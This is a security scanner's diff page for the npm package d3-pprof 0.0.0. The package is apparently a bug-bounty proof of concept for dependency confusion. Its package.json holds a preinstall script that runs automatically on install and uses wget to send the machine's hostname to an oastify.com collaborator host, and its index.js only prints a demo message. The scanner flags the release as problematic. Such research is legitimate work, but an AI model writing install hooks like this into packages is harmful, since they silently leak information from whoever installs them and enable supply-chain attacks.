d3-pprof 0.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of d3-pprof might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +16 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log("This is an example for a dpendency confusion vulnerability")
|
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "d3-pprof",
|
3
|
+
"version": "0.0.0",
|
4
|
+
"description": "Demo package for dependency confusion testing",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall":"wget http://$(hostname).tnkkk63eiymv43rba2cljb3yppvgq4hs6.oastify.com/d3-pprof/$(hostname)",
|
8
|
+
"start": "node index.js"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
],
|
12
|
+
"author": "https://hackerone.com/moti-h",
|
13
|
+
"license": "MIT",
|
14
|
+
"dependencies": {
|
15
|
+
}
|
16
|
+
}
|